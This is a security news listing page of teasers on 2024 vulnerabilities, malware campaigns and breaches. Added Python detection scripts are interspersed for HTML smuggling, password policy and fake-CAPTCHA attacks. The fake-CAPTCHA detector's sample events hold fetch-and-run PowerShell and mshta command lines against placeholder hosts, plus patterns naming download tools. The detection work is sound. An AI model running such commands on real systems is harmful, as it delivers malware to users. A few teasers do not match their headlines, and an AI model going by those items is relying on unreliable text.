A stored XSS vulnerability in Roundcube Webmail is being exploited in attacks on government agencies in former Soviet states. Researchers identified the attack but could not determine the perpetrators. Researchers detected active [...]

By | October 25th, 2024|Exploitation, Security Advisory, Security Update, vulnerability|0 Comments

GitLab Patches Critical HTML Injection Flaw Allowing XSS Attacks

GitLab released patches (17.5.1, 17.4.3, and 17.3.6) for both Community and Enterprise Editions, fixing a critical HTML injection vulnerability in the Global Search feature that could lead to XSS attacks, [...]

Lazarus APT Hackers Exploit Chrome Zero-Day via Crypto Game

Lazarus APT exploited a Chrome zero-day using a crypto-themed game as bait, showcasing the group’s evolving financial tactics and social engineering. On May 13, 2024, Kaspersky detected a new infection [...]

Critical Vulnerabilities Found in VMware vCenter Server

Broadcom has issued critical security updates for severe vulnerabilities in VMware vCenter Server that allow remote code execution and privilege escalation. The flaws, CVE-2024-38812 and CVE-2024-38813, impact multiple versions of [...]

GHOSTPULSE Malware Leverages PNG Pixel Structure for Evasion

PNG files are ubiquitous on the internet, which makes them a convenient carrier for threat actors, who can hide malicious code in them using techniques like steganography. [...]

Hackers Impersonate ESET to Distribute Wiper Malware

Hackers posed as ESET to spread wiper malware via phishing emails starting October 8, 2024. The emails, claiming to be from “ESET’s Advanced Threat Defense Team,” warned of state-sponsored attacks [...]

Hackers use Bumblebee malware to infiltrate corporate networks

Bumblebee malware has reemerged, threatening corporate networks globally, in its first sighting since Europol’s Operation Endgame in May 2024. Bumblebee, first identified by Google's Threat Analysis Group in March [...]

Hackers Reportedly Selling Stolen Data from Cisco

A group of hackers reportedly sells sensitive data stolen from Cisco, allegedly by IntelBroker in collaboration with EnergyWeaponUser and zjj, raising concerns in the tech industry. Breach Details: A post [...]

By | October 15th, 2024|cisco, Internet Security, Security Advisory, Security Update|0 Comments

ErrorFather hackers remotely attack and control Android devices

The ErrorFather campaign, a new variant of the Cerberus banking trojan, emerged in September 2024. It uses a multi-stage dropper to spread and has seen a rise in activity, posing [...]

PureLogs, a low-cost infostealer, is targeting Chrome browsers

Infostealer malware, like the recently identified PureLogs, poses significant risks due to its low cost and ease of use, making it accessible to even low-level hackers. PureLogs is a 64-bit [...]

Hackers exploited a zero-day vulnerability in Qualcomm chips, targeting Android users

Hackers exploit a zero-day vulnerability (CVE-2024-43047) in Qualcomm chipsets, risking millions of Android users globally. The flaw stems from memory corruption in DSP Services. Zero-day vulnerability in Qualcomm chips: Google’s [...]

Foxit PDF Reader vulnerability allows attackers to execute arbitrary code

Researchers revealed six new vulnerabilities, including a critical one in Foxit PDF Reader that allows arbitrary code execution. Three flaws were also found in Veertu's Anka Build, threatening CI/CD environments [...]

Mozilla warns of a Firefox zero-day vulnerability actively exploited in cyberattacks

A critical use-after-free vulnerability in Firefox and Firefox Extended Support Release (ESR) is being actively exploited in cyberattacks. Mozilla has issued a warning about a critical zero-day vulnerability in Firefox, [...]

CISA warns of active exploitation of Microsoft zero-day vulnerabilities

CISA warns of two critical Microsoft zero-day vulnerabilities, CVE-2024-43572 and CVE-2024-43573, actively exploited in the wild. CVE-2024-43572: The first vulnerability, CVE-2024-43572, affects the Microsoft Windows Management Console, allowing attackers to [...]

Hackers breached the president’s account of a Japanese aerospace company

Hackers infiltrated JAXA, compromising top officials' accounts, including President Hiroshi Yamakawa, in a series of cyberattacks since June 2023. Since mid-2023, JAXA has been hit by four significant cyberattacks. In [...]

By | October 9th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

LemonDuck malware targets Windows servers by exploiting SMB vulnerabilities

Attackers used the EternalBlue vulnerability to access the observatory farm, create a hidden admin share, and run a malicious batch file named p.bat, which opened firewall ports, set up port [...]

By | October 8th, 2024|Malware, Security Advisory, Security Update, vulnerability|0 Comments

Cacti vulnerability allows attackers to execute remote code

A critical vulnerability in the Cacti network monitoring tool, discovered in version 1.2.28, could allow attackers to execute remote code on affected systems. This flaw is particularly concerning for system [...]

CVE-2024-30052: RCE vulnerability in Visual Studio via dump files

A researcher identified a method to exploit Visual Studio by executing arbitrary code during the debugging of managed dump files, without needing memory corruption or specific PDB file components. By [...]

WarmCookie malware spreads via fake update campaign in France

FakeUpdate, a fake browser update scam, is now targeting users in France, aiming to deploy the WarmCookie backdoor malware. FakeUpdate Spreads WarmCookie as Chrome, Edge Updates: Researchers at Gen Threat [...]

Perfctl malware targets millions of Linux servers

Perfctl, a stealthy malware, is actively targeting millions of Linux servers worldwide. Discovered by Aqua Nautilus researchers, it exploits over 20,000 different server misconfigurations. This campaign has been ongoing for [...]

Arc Browser Launches Bug Bounty Program After RCE Vulnerability

The Browser Company has launched a Bug Bounty Program for its Arc Browser after quickly resolving a remote code execution (RCE) vulnerability, as announced by CEO Josh, highlighting their commitment [...]

Chrome vulnerabilities enable attackers to run arbitrary code

Google released a Chrome update fixing critical vulnerabilities that could allow arbitrary code execution. Version 129.0.6668.89/.90 is now available for Windows, Mac, and Linux. All about the Chrome vulnerabilities: Three [...]

New XWorm variant spreads via Windows script files

XWorm is malware known for its obfuscation techniques and ability to evade detection, posing a significant cybersecurity threat. Netskope recently found a new variant delivered via a Windows script [...]

Hackers targeting Docker Swarm, Kubernetes, and SSH servers in large-scale attacks

Hackers are exploiting Docker Swarm, Kubernetes, and SSH servers, using exposed Docker API endpoints as the entry point in a widespread malware campaign, according to Datadog researchers. Large-Scale Server Exploits: Threat [...]

Linux CUPS has multiple vulnerabilities that allow remote code execution

Developers of the Linux printing system CUPS recently disclosed several vulnerabilities that could allow attackers to execute arbitrary code. Although these flaws require specific conditions to be exploited, their high [...]

GorillaBot reigns as DDoS king with 300,000+ commands

The newly emerged Gorilla Botnet has launched over 300,000 DDoS attacks across 100+ countries from September 4 to 27. A modified version of Mirai, it supports multiple CPU architectures and [...]

North Korean Hackers Tried to Steal Military Data

Diehl Defence anti-aircraft missiles are successfully intercepting Russian attacks on Kyiv, with a 100% hit rate. Germany also plans to install these systems on three new government aircraft for missile [...]

HTML smuggling enables hackers to deliver convincing phishing attacks

Phishing attackers used an HTML smuggling technique to deliver malware. The attack began with a phishing email that looked like an American Express notification, leading to several redirects. The last [...]
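The technique above assembles the payload inside the browser rather than attaching it, so mail filters see only an HTML file with a long encoded string and a few lines of script. The following triage script is an added example, not code from the original article or from the campaign; the sample HTML and its "binary" are constructed stand-ins, and the score threshold of 3 is an assumption. It looks for the JavaScript constructs that build and hand off a file client-side, decodes any long base64 run, and checks the decoded bytes for executable or archive magic.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators (added example)."""
import base64
import binascii
import re

# Constructed sample, not the campaign's file: a minimal page that decodes a
# base64 blob in the browser and triggers a download, the shape HTML smuggling takes.
_FAKE_BINARY = b"MZ" + b"\x90" * 300          # stands in for a real PE payload
SAMPLE_HTML = """<html><body><p>Your statement is ready.</p>
<script>
var data = 'PAYLOAD';
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'Statement.pdf.exe';
a.click();
</script></body></html>""".replace("PAYLOAD", base64.b64encode(_FAKE_BINARY).decode())

BENIGN_HTML = "<html><body><h1>Hello</h1><p>No script here.</p></body></html>"

# JavaScript constructs that assemble a file client-side and hand it to the user
JS_INDICATORS = {
    "atob":          re.compile(r"\batob\s*\("),
    "blob_ctor":     re.compile(r"new\s+Blob\s*\("),
    "object_url":    re.compile(r"URL\.createObjectURL\s*\("),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]"),
    "ms_save_blob":  re.compile(r"msSaveOrOpenBlob|msSaveBlob"),
    "auto_click":    re.compile(r"\.click\s*\(\s*\)"),
}
# Long base64 runs: 200+ characters is far longer than a typical inline data URI
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
MAGIC = {b"MZ": "PE executable", b"PK\x03\x04": "ZIP archive",
         b"Rar!": "RAR archive", b"\x7fELF": "ELF executable"}


def decode_b64_runs(html, min_len=200):
    """Decode every long base64 run in the document and report what it looks like."""
    found = []
    for m in B64_RUN.finditer(html):
        body = m.group(0).rstrip("=")
        if len(body) < min_len:
            continue
        try:
            raw = base64.b64decode(body + "=" * (-len(body) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue
        kind = next((name for sig, name in MAGIC.items() if raw.startswith(sig)), "unknown")
        found.append({"b64_len": len(body), "decoded_len": len(raw), "type": kind})
    return found


def analyze_html(html):
    """Score one HTML document; a decoded executable or archive counts double."""
    hits = [name for name, rx in JS_INDICATORS.items() if rx.search(html)]
    blobs = decode_b64_runs(html)
    score = len(hits) + 2 * sum(1 for b in blobs if b["type"] != "unknown")
    return {"indicators": hits, "blobs": blobs, "score": score, "suspicious": score >= 3}


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, analyze_html(doc))
```

Run it over quarantined .html/.htm attachments; a hit on the decoded-magic check is the strongest signal, since legitimate pages rarely carry a base64-encoded PE or ZIP that the script immediately offers for download.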

NIST Recommends New Password Security Rules

NIST released new password security guidelines in Special Publication 800-63B, improving cybersecurity and user experience. One of the key changes in NIST’s guidelines is their view on password complexity. Instead [...]
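The guidance replaces character-class rules with length, a blocklist of breached and common passwords, and no forced rotation. The check below is an added example, not NIST's or the article's code: it puts the legacy composition policy beside a NIST-style evaluator so the difference is visible on real inputs. The blocklist is a constructed stand-in for a breached-password corpus, and the thresholds (15 characters when the password is the only factor, 8 with MFA, at least 64 accepted) are taken from the SP 800-63B rev. 4 draft and are an assumption of this code.

```python
"""NIST SP 800-63B-style password check beside the legacy policy it replaces (added example)."""
import re
import unicodedata

# Constructed blocklist standing in for a breached/common-password corpus
# (production: k-anonymity lookup against Have I Been Pwned or a local list).
BLOCKLIST = {"password", "123456", "qwerty", "letmein", "welcome1", "p@ssw0rd",
             "iloveyou", "admin123"}

# Assumed thresholds from the SP 800-63B rev. 4 draft: 15 characters when the
# password is the only factor, 8 when paired with MFA, at least 64 accepted.
MIN_LEN_SINGLE_FACTOR = 15
MIN_LEN_WITH_MFA = 8
MAX_LEN_ACCEPTED = 64


def legacy_policy(pw):
    """The complexity rule NIST moved away from: 8+ chars with four character classes."""
    return (len(pw) >= 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


def evaluate_password(pw, mfa_present=False, context_words=()):
    """NIST-style check: length, blocklist and context words only.

    No character-class rules, no hints, no periodic rotation; spaces and all
    printable Unicode are allowed. Returns (accepted, reasons).
    """
    pw = unicodedata.normalize("NFKC", pw)   # 800-63B: normalise before measuring length
    reasons = []
    min_len = MIN_LEN_WITH_MFA if mfa_present else MIN_LEN_SINGLE_FACTOR
    if len(pw) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    if len(pw) > MAX_LEN_ACCEPTED:
        reasons.append(f"longer than the {MAX_LEN_ACCEPTED} characters this verifier stores")
    folded = pw.casefold()
    if folded in BLOCKLIST:
        reasons.append("appears on the blocklist of breached/common passwords")
    for word in context_words:               # username, service name, employer, etc.
        if len(word) >= 4 and word.casefold() in folded:
            reasons.append(f"contains context-specific word {word!r}")
    return (not reasons, reasons)


if __name__ == "__main__":
    for candidate in ("P@ssw0rd", "Tr0ub4dor&3", "correct horse battery staple"):
        print(f"{candidate!r}: legacy={legacy_policy(candidate)} "
              f"nist={evaluate_password(candidate)}")
```

The contrast is the point: "P@ssw0rd" satisfies every legacy class rule and is rejected here because it is on the blocklist, while a long passphrase with spaces and no digits fails the legacy rule and passes the NIST-style check.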

By | September 27th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Watch out for fake “verify you’re human” prompts that can deliver malware

CAPTCHAs (Completely Automated Public Turing tests to tell Computers and Humans Apart) are used online to verify that users are human, not bots. They usually present challenges like distorted text, image recognition tasks, or audio prompts [...]

TeamViewer Privilege Escalation Vulnerability

Two critical vulnerabilities in TeamViewer’s Remote client for Windows, CVE-2024-7479 and CVE-2024-7481, allow attackers to elevate privileges on affected systems across multiple versions. TeamViewer Vulnerability Flaw: The vulnerability in TeamViewer arises [...]

Google Warns of North Korean IT Workers Infiltrating U.S. Workforce

Recently, Google alerted organizations about North Korean IT workers acting on behalf of hackers. Organizations today face rising cybersecurity threats that can cause major financial and reputational harm. Cybersecurity entails [...]

By | September 26th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

0-day flaws in Automated Tank Gauge systems threaten critical infrastructure.

Researchers at BitSight TRACE found multiple 0-day vulnerabilities in ATG systems used to manage fuel storage tanks, posing risks to public safety and economic stability. These flaws could lead to [...]

Cisco Smart Licensing Vulnerability Allows Attackers to Control Devices

Cisco revealed a critical vulnerability, CVE-2024-20439, in its Smart Licensing Utility, allowing unauthorized access due to a hardcoded static password found by an independent researcher. CVE-2024-20439: This vulnerability mainly affects [...]

macOS Sequoia update disrupts multiple security tools

Apple’s macOS 15 Sequoia update has broken several key security tools, sparking user frustration across social media and Mac developer forums. macOS Sequoia Update: The release of macOS Sequoia has [...]

By | September 24th, 2024|Internet Security, MacOS, Security Advisory, Security Update|0 Comments

Fake CAPTCHA sites install Lumma Stealer malware

A new malware campaign is gaining traction online, using fake CAPTCHA sites to trick users into installing Lumma Stealer (also known as Lumma C2). Users are asked to press specific [...]
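Both fake-CAPTCHA items above (the "verify you're human" prompt and the Lumma Stealer variant) end the same way: the page asks the user to press Win+R and paste a command, so the first attacker-controlled process is a script interpreter spawned by explorer.exe with a download-and-execute command line. The triage below is an added example, not code from either article or from the campaigns; the events are constructed, Sysmon-style process-creation records (hostnames use the reserved .invalid domain), and the pattern list and alerting rule are assumptions of this code rather than a published detection.

```python
"""Triage of process-creation events for the Win+R fake-CAPTCHA (ClickFix) pattern (added example)."""
import re

# Constructed events, not real telemetry. Windows also records the pasted command in
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, a useful corroborating artifact.
SAMPLE_EVENTS = [
    {"id": 1, "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (irm https://check.example.invalid/v.txt)" '
                '# "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"id": 2, "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"id": 3, "user": "bob", "parent": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": 'pwsh.exe -c "irm https://get.example.invalid/install.ps1 | iex"'},
    {"id": 4, "user": "carol", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://verify.example.invalid/human.hta"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R and the Start search box spawn from explorer.exe

CMDLINE_PATTERNS = {
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command":   re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # a download primitive anywhere in the line plus an execution sink anywhere in the line
    "download_and_run":  re.compile(
        r"(?=.*\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
        r"curl|certutil|bitsadmin)\b)(?=.*(?:\biex\b|invoke-expression|\|))", re.I | re.S),
    "mshta_remote":      re.compile(r"\bmshta(?:\.exe)?\s+(?:https?|vbscript|javascript):", re.I),
    "verification_lure": re.compile(r"i am not a robot|captcha|verification id|ray id", re.I),
}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (matched pattern names, alert?) for one process-creation event."""
    if _basename(ev["image"]) not in INTERPRETERS:
        return [], False
    hits = [name for name, rx in CMDLINE_PATTERNS.items() if rx.search(ev["cmdline"])]
    from_run_dialog = _basename(ev["parent"]) in RUN_DIALOG_PARENTS
    # One pattern suffices when the interpreter was launched from explorer.exe (what a
    # Win+R paste looks like); otherwise require two, so developers piping an installer
    # into iex from a terminal do not page the on-call analyst.
    alert = (from_run_dialog and len(hits) >= 1) or len(hits) >= 2
    return hits, alert


def triage(events):
    """List alerts as dicts with the event id, user and matched patterns."""
    alerts = []
    for ev in events:
        hits, alert = score_event(ev)
        if alert:
            alerts.append({"id": ev["id"], "user": ev["user"], "patterns": hits})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a)
```

Feeding real Sysmon Event ID 1 or EDR process records into `triage` needs only the four fields used here; the `verification_lure` pattern catches the comment many of these lures append to the pasted command so the Run box looks like a verification code.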

Disney to End Use of Slack After Hack Exposes Company Data

The Walt Disney Company will stop using Slack for internal communication following a hack that leaked over a terabyte of company data. In a memo to employees, Disney CFO Hugh [...]

By | September 23rd, 2024|Compromised, Exploitation, Security Advisory, Security Update|0 Comments

MediaTek Wi-Fi Zero-Click RCE Vulnerability

A critical 0-click RCE vulnerability (CVE-2024-20017) in MediaTek Wi-Fi 6 chipsets, used by devices like Ubiquiti, Xiaomi, and Netgear, allows remote attacks without user interaction. CVE-2024-20017: The vulnerability is located [...]

By | September 23rd, 2024|RCE Flaw, Security Advisory, Security Update, vulnerability, Zero Day Attack|0 Comments

Hacker stole data from Federal Bank customers

A threat actor has allegedly claimed a breach of Federal Bank, exposing sensitive data of hundreds of thousands of customers. ThreatMon first reported the breach on X, quickly drawing attention [...]

New macOS malware allows attackers to control devices remotely

HZ RAT, a remote access trojan (RAT) that has targeted Windows devices since 2020, has recently been upgraded to also attack Mac users. A RAT allows attackers to gain remote [...]

Threat actors claim to have compromised Dell’s employee database

A hacking group has claimed responsibility for breaching the Dell employee database, asserting access to sensitive information of around 10,800 employees and partners on a prominent hacking forum. The breach [...]

By | September 20th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update, Tips|0 Comments

CISA Issues Six Advisories for Industrial Control Systems

CISA has issued six advisories highlighting vulnerabilities in various industrial control systems. The advisories cover: Rockwell Automation’s RSLogix 5 and RSLogix 500 software, which are widely used for programming and [...]

By | September 20th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Researchers Uncover Raptor Train Botnet with 60,000+ Devices

Researchers discovered a large Chinese state-sponsored IoT botnet, "Raptor Train," which compromised over 200,000 SOHO and IoT devices. Operated by Flax Typhoon, the botnet uses a sophisticated control system called [...]

Threat Actor Claims to Be Selling Bharat Petroleum Database

A threat actor is reportedly selling a database from Bharat Petroleum Corporation Limited (BPCL). DarkWebInformer first reported this on X, raising serious cybersecurity concerns for the corporation and its stakeholders. [...]

By | September 18th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Scams and Fake Websites during Amazon Prime Day

Amazon Prime Day scams are fraudulent schemes that exploit the retailer's annual sales event. While the event is a big opportunity for retailers, scammers also use it to target unsuspecting [...]

Apple releases iOS 18, fixing 32 security vulnerabilities

Apple has released iOS 18, fixing 32 security vulnerabilities. The update is available for iPhone XS and later, along with iPad Pro (13-inch, 12.9-inch 3rd gen and newer), iPad Pro [...]

By | September 18th, 2024|Apple, Security Advisory, Security Update|0 Comments

North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking [...]

By | September 17th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update|0 Comments

Hackers leverage Selenium Grid for malicious activity

Threat actors are exploiting Selenium Grid's default lack of authentication in two active campaigns, deploying exploit kits, cryptominers, and proxyjackers. All about Selenium Grid Tool: Selenium Grid's widespread adoption among [...]

Critical Vulnerabilities Impact Millions of D-Link Routers — Patch Now!

Millions of D-Link routers are vulnerable to critical security flaws. Urgent firmware updates have been released, and users are advised to patch their devices immediately to prevent exploitation. CVE-2024-45694: Stack-based Buffer [...]

Windows MSHTML zero-day actively exploited

Adobe's September 2024 updates fixed 28 vulnerabilities, including a critical ColdFusion flaw (CVSS 9.8). Other affected products include Photoshop, Illustrator, Premiere Pro, After Effects, Audition, and Media Encoder. These updates [...]

Apache Patches Critical OFBiz RCE Vulnerability

Hackers are exploiting a critical Apache OFBiz vulnerability (CVE-2024-45195) that allows unauthenticated remote code execution, threatening organizations using OFBiz. Apache OFBiz Flaw, CVE-2024-45195: The vulnerability results from missing view [...]

Kali Linux 2024.3 Launches with New Hacking Tools

Kali Linux 2024.3, the latest version of Offensive Security's Debian-based distribution for ethical hacking, has been released. This update introduces 11 new tools and includes key behind-the-scenes improvements. The Kali [...]

By | September 13th, 2024|Security Advisory, Security Update, Tips|0 Comments

New Loki Backdoor Targets macOS Systems

Cody Thomas created Apfell in 2018, an open-source macOS post-exploitation framework that later evolved into Mythic, a cross-platform framework addressing the limits of existing tools. Loki Backdoor: Mythic offers a [...]

By | September 12th, 2024|Backdoor, Internet Security, MacOS, Malware, Security Advisory, Security Update|0 Comments

New Android Spyware Posing as TV Streaming App Steals Data

Recent research has uncovered new Android Spyware targeting mnemonic keys, vital for cryptocurrency wallet recovery. Disguised as legitimate apps, the malware scans devices for images containing mnemonic phrases and steals [...]

By | September 12th, 2024|Android malware, Malware, Security Advisory, Security Update, spyware|0 Comments

CosmicBeetle Targets SMBs Worldwide Using Old Vulnerabilities

Hackers target SMBs because they often have weaker security and lack cybersecurity awareness. Without regular security audits or incident response plans, SMBs become easy targets for attackers exploiting vulnerabilities. CosmicBeetle [...]

Zyxel NAS Devices Prone to Command Injection Attacks

Zyxel released critical hotfixes for a command injection vulnerability in two of its NAS products, NAS326 and NAS542. Although these devices have reached the end of vulnerability support, they remain [...]

By | September 10th, 2024|BOTNET, Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Hackers Exploit GeoServer RCE to Deploy Malware

Cybersecurity researchers at Fortinet recently discovered that hackers have been exploiting a GeoServer RCE vulnerability, tracked as CVE-2024-36401, to deploy malware. GeoServer RCE Vulnerability: GeoServer is an [...]

Vulnerabilities in IBM WebSphere Integration Server could let attackers execute commands.

Critical vulnerabilities have been found that could let attackers execute commands on systems. These issues, listed in the Common Vulnerabilities and Exposures (CVE) system, pose serious risks and need urgent [...]

By | September 9th, 2024|Tips, vulnerability|0 Comments

Akira Ransomware Targets SonicWall Firewall RCE Flaw

SonicWall revealed a critical RCE vulnerability (CVE-2024-40766) in SonicOS on August 22, 2024. Initially, no exploitation was reported, but by September 6, active attacks were detected. This flaw allows attackers [...]

By | September 9th, 2024|Ransomware, RCE Flaw, Security Advisory, Security Update, vulnerability|0 Comments

Predator Spyware leverages “one-click” and “zero-click” exploits

Recent research shows Predator spyware has resurfaced with improved evasion techniques, despite US sanctions. It's still active in countries like the DRC and Angola, targeting high-profile individuals with harder-to-track infrastructure, [...]

By | September 6th, 2024|Exploitation, Malware, Security Advisory, Security Update, spyware, vulnerability|0 Comments

Lazarus Hackers Targeting Job Seekers with JavaScript Malware

Lazarus Group, a notorious North Korean-linked hacker group active since 2010, has intensified its attacks in 2024. Group-IB researchers found Lazarus running "Contagious Interview" campaigns using BeaverTail malware and the [...]

ToddyCat APT Exploits SMB and IKEEXT RCE to Deploy ICMP Backdoor

ToddyCat is an APT group active since December 2020, targeting government and military entities in Europe and Asia. Known for sophisticated cyber-espionage, Kaspersky Lab found ToddyCat exploiting SMB, IKEEXT, and [...]

New Emansrepo Malware Targets Windows via HTML Files

Emansrepo, a Python infostealer, is spread through phishing emails with fake purchase orders. The attack has evolved, now involving multiple stages. Stolen data is zipped and sent to the attacker, [...]

RCE Vulnerability in D-Link WAP Allows Remote Access by Attackers

The D-Link DAP-2310 Wireless Access Point is vulnerable to remote code execution, allowing attackers to gain unauthorized remote access. Discovered by Dark Wolf Solutions, this guide covers the details of [...]

By | September 3rd, 2024|BOTNET, Exploitation, Security Advisory, Security Update, Tips, vulnerability|0 Comments

New ManticoraLoader Malware Targets Citrix Users for Data Theft

DeadXInject, the group behind AresLoader and AiDLocker ransomware, is now offering ManticoraLoader, a new Malware-as-a-Service (MaaS) targeting Windows systems. Available on underground forums and Telegram since August 8th, 2024, this [...]

Snake Keylogger Targets Windows via Malicious Excel Files

Researchers have identified a sophisticated phishing campaign using a .NET-based Snake Keylogger variant. This attack uses weaponized Excel files to compromise Windows systems, posing serious risks to data security. Snake [...]

Voldemort Hackers Exploit Google Sheets to Target Windows Users

Proofpoint researchers have uncovered a cyberattack campaign, "Voldemort," using Google Sheets as a C2 platform. Targeting Windows users, the campaign employs a unique attack chain with both common and rare [...]

Watch Out for Fake Palo Alto Tool Spreading Advanced Malware

A sophisticated malware is threatening organizations in the Middle East by disguising itself as the legitimate Palo Alto GlobalProtect tool. It uses a two-stage infection process and advanced command-and-control (C&C) [...]

Critical Vulnerability in Perl Installer Enables Traffic Interception

A critical vulnerability in App::cpanminus (cpanm), a popular tool for installing Perl modules, has been identified. Known as CVE-2024-45321, it allows attackers to intercept and manipulate traffic during module installation, [...]

Research Uncovers Eight Android and iOS Apps Leaking Users’ Sensitive Data

The eight Android and iOS apps fail to protect user data by transmitting sensitive information, such as device details, geolocation, and credentials, over HTTP instead of HTTPS. This exposes data [...]

EDR Killer Malware Disables Security Tools on Windows Machines

Attackers can exploit Windows drivers to bypass security by exploiting vulnerabilities or using stolen signatures to load malicious drivers into the kernel, disabling protections. While Microsoft enforces driver signature rules, [...]

Apache Vulnerability Exposed Unix Systems to Data Theft

A recently disclosed vulnerability in the Apache Portable Runtime (APR) library, identified as CVE-2023-49582, could expose sensitive application data on Unix platforms. Apache Vulnerability: The flaw results from insufficient permissions [...]

Microsoft 365 Flags Image Emails as Malware

Microsoft 365 users report emails with images being wrongly flagged as malware and quarantined, identified as Issue ID: EX873252. This issue has raised significant concerns among businesses and individual users [...]

By | August 27th, 2024|Internet Security, Malware, Microsoft, Security Advisory, Security Update|0 Comments

Ransomware Hits Patelco Credit Union, Steals Customer and Employee Data

Patelco Credit Union revealed a ransomware attack compromising member and employee data, raising concerns about security and privacy. All about the Ransomware: Patelco Credit Union detected a ransomware attack on [...]

BeaverTail Malware Hits Windows Users via Games

Researchers discovered a new malware campaign called BeaverTail, targeting job seekers in a North Korean cyber espionage operation. BeaverTail Malware: Initially identified as a JavaScript-based info stealer, BeaverTail has evolved [...]

Active Exploitation of Chrome Zero-Day Vulnerability

Google has released Chrome 128 (128.0.6613.84 for Linux and 128.0.6613.84/.85 for Windows and Mac) to address a critical zero-day vulnerability actively exploited in the wild. The update includes 38 security [...]

Caution: Malicious Slack Ads Deliver Harmful Payloads

Cybercriminals are using Google search ads to distribute malware disguised as legitimate ads for Slack. This advanced tactic shows how threat actors are getting better at avoiding security measures and [...]

Ngate malware steals card funds on Android devices

ESET researchers recently identified new Android malware called “NGate” that allows hackers to withdraw money from victims’ payment cards. NGate malware: NGate Android malware, identified in November 2023, represents a [...]

Log4j Vulnerability Exploited Again to Deploy Crypto-Mining Malware

Recent Log4j attacks use obfuscated LDAP requests to execute malicious scripts, establish persistence, and exfiltrate data. Multiple backdoors and encrypted channels maintain control, emphasizing the ongoing threat of the Log4j [...]

Backdoor in MIFARE Smart Cards Reveals User-Defined Keys

Researchers uncover new attack vectors in MIFARE Classic cards by analyzing the CRYPTO-1 algorithm and vulnerabilities, demonstrating how to extract data, clone cards, and compromise both new and old card [...]

New UULoader Malware Spreads Gh0st RAT and Mimikatz

UULoader malware delivers payloads like Gh0st RAT and Mimikatz, targeting Korean and Chinese speakers through malicious installers. UULoader Malware: Discovered by the Cyberint Research Team, the malware includes Chinese strings [...]

Dell SupportAssist Vulnerability Enables Privilege Escalation on PCs

A critical security vulnerability affects Dell SupportAssist for Home PCs, specifically in installer version 4.0.3. Dell SupportAssist Vulnerability: CVE-2024-38305 lets local low-privileged attackers escalate their privileges and run arbitrary code [...]

Unauthenticated RCE in WordPress Plugin Exposes 100K Sites

A critical vulnerability (CVE-2024-5932) in the GiveWP plugin exposes over 100,000 WordPress sites to remote code execution (RCE) attacks, as disclosed by researcher villu164 through the Wordfence Bug Bounty Program. [...]

MegaMedusa: A Powerful Web DDoS Tool Used by Hackers

RipperSec, a pro-Palestinian Malaysian hacktivist group that started on Telegram in June 2023, has quickly grown to over 2,000 members. They carry out cyberattacks like data breaches, defacements, and DDoS [...]

Urgent: Windows TCP/IP Vulnerability Discovered, Update Now

A critical vulnerability in the Windows TCP/IP stack enables unauthenticated remote code execution (RCE) through specially crafted IPv6 packets. This flaw affects all supported versions of Windows and Windows Server, [...]

Vulnerability in Microsoft Apps Let Hackers Spy on Mac Users

A critical vulnerability in Microsoft apps for macOS allowed hackers to surreptitiously spy on Mac users' activities. Security researchers from Cisco Talos revealed how attackers could exploit this flaw to [...]

By | August 20th, 2024|MacOS, Malware, Microsoft, Security Advisory, Security Update, vulnerability|0 Comments

New Styx Stealer Targets Users to Steal Login Passwords

A new threat called Styx Stealer has emerged, targeting users by stealing sensitive data like saved passwords, cookies, and autofill details from popular web browsers. Styx Stealer: This malware targets [...]

Google Pixel Devices Shipped with Flawed App

Recent research revealed a vulnerability in the Android package of many Google Pixel smartphones. Devices shipped globally since September 2017 could be at risk of malware due to a pre-installed [...]

Lazarus Group Exploited Windows Zero-day

The notorious Lazarus hacker group exploited a zero-day vulnerability in Microsoft Windows, targeting the Ancillary Function Driver for WinSock (AFD.sys), identified as CVE-2024-38193. Discovered by researchers Luigino Camastra and Milanek [...]

